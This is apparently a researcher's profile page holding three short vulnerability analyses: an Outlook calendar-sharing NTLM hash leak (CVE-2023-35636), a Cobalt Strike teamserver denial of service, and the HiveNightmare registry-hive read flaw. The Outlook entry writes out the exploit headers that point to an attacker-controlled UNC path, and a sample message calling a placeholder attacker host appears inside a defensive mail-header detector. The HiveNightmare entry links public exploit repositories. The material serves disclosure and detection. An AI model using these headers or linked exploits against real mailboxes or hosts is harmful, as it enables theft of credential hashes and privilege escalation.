Dviros (9)

Last Login: January 21, 2024
Assessments: 3
Score: 9

Dviros's Latest (3) Contributions

2 Ratings
Technical Analysis

Discovered by Dolev Taler from the Varonis Threat Labs team, CVE-2023-35636 is an exploit of the calendar-sharing function in Microsoft Outlook, whereby adding two headers to an email directs Outlook to share content and contact a designated machine, creating an opportunity to intercept an NTLM v2 hash.

  1. An attacker crafts an email invite to the victim, pointing the “.ICS” file path to the attacker-controlled machine. By “listening” to a self-controlled path (domain, IP, folder path, UNC, etc.), the threat actor can obtain connection attempt packets that contain the hash used to access this resource. Many tools are used to perform this listening, and in the example above, Responder.py was used (the go-to tool for every SMB and NTLM hash attack).
  2. If the victim clicks on the “Open this iCal” button inside the message, their machine will attempt to retrieve the configuration file on the attacker’s machine, exposing the victim’s NTLM hash during authentication.

Exploited headers:
"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics

  1. “Content-Class” = “Sharing” — This tells Outlook that this email contains sharing content.
  2. “x-sharing-config-url” = \\(Attacker machine)\a.ics — The second line points the victim’s Outlook to the attacker’s machine.

Usually, NTLM v2 should be used when attempting to authenticate against internal IP-address-based services. However, when the NTLM v2 hash is passing through the open internet, it is vulnerable to relay and offline brute-force attacks.
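A mail-gateway or SIEM check for the two headers described above, added here as an example and not code from Varonis or from this assessment. It assumes a constructed sample message, a placeholder host "attacker.example" standing in for any host the organisation does not control, and a hypothetical allow-list of hosts that are permitted to serve calendar-sharing configuration files:

```python
import email
from email import policy
from urllib.parse import urlparse

# Constructed sample messages (not real captures). "attacker.example" is a
# placeholder for a host outside the organisation's control.
SHARING_INVITE = b"""From: sender@example.com
To: victim@example.com
Subject: Calendar invite
Content-Class: Sharing
x-sharing-config-url: \\\\attacker.example\\share\\a.ics
Content-Type: text/plain

Please open this iCal.
"""

PLAIN_MAIL = b"""From: sender@example.com
To: victim@example.com
Subject: Hello
Content-Type: text/plain

Nothing to see here.
"""

# Assumption: the only hosts that legitimately serve .ics sharing configs.
TRUSTED_HOSTS = {"calendar.example.com"}


def sharing_target(raw: bytes):
    """Return the x-sharing-config-url value if the message is a Sharing-class
    mail carrying one, otherwise None."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    if (msg.get("Content-Class") or "").strip().lower() != "sharing":
        return None
    return (msg.get("x-sharing-config-url") or "").strip() or None


def target_host(target: str) -> str:
    """Extract the host from a UNC path (\\\\host\\share\\file) or a URL."""
    t = target.strip()
    if t.startswith("\\\\"):
        return t[2:].split("\\", 1)[0].lower()
    return (urlparse(t).hostname or "").lower()


def is_suspicious_sharing_invite(raw: bytes, trusted_hosts=TRUSTED_HOSTS) -> bool:
    """Flag a Sharing-class mail whose config URL points outside the allow-list,
    i.e. a message that would make Outlook authenticate to an unknown host."""
    target = sharing_target(raw)
    if target is None:
        return False
    return target_host(target) not in trusted_hosts


if __name__ == "__main__":
    for name, raw in (("invite", SHARING_INVITE), ("plain", PLAIN_MAIL)):
        print(name, "suspicious" if is_suspicious_sharing_invite(raw) else "ok")
```

The check keys on the pair of headers rather than on the `.ics` extension alone, because a Sharing-class message pointing at a host that is not on the allow-list is the condition under which the client would send an NTLM authentication attempt to that host; the same logic applies whether the target is written as a UNC path or as a URL.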

2 Ratings
  • Attacker Value
    High
  • Exploitability
    Very High
Technical Analysis

As Cobalt Strike’s source code got leaked in November 2020, it seems that versions 4.2 and 4.3 are both vulnerable to a Denial of Service attack that occurs when a new beacon registers with the Teamserver, thus causing a memory load and server crash.
The attacker needs to know the relevant beacon configuration prior to execution, but this can be done rather easily with a multitude of tools released on GitHub that perform config extraction from known Cobalt Strike C2 servers.
Cobalt Strike has become a tool commonly used by different threat actor groups worldwide, due to its availability, capabilities and effectiveness in covert channels.

SentinelOne has researched, reported and released PoC code that triggers this vulnerability:
https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/

As the PoC code got released, it is safe to assume that vulnerable C2 servers worldwide are being attacked.

To fix this issue, version 4.4 was released.

2 Ratings
Technical Analysis

The vulnerability is easy to exploit – by interacting with the local ShadowCopy volume and copying it to a local folder, attackers can easily elevate their privileges.
Several exploits were already released, allowing the hashes to be parsed while copying the SAM\SECURITY\SYSTEM hives:
https://github.com/cube0x0/CVE-2021-36934
https://github.com/HuskyHacks/ShadowSteal

This vulnerability occurs due to the permissive privileges on “C:\Windows\System32\Config\*.*” for “BUILTIN\Users”, allowing any user to read and execute the files.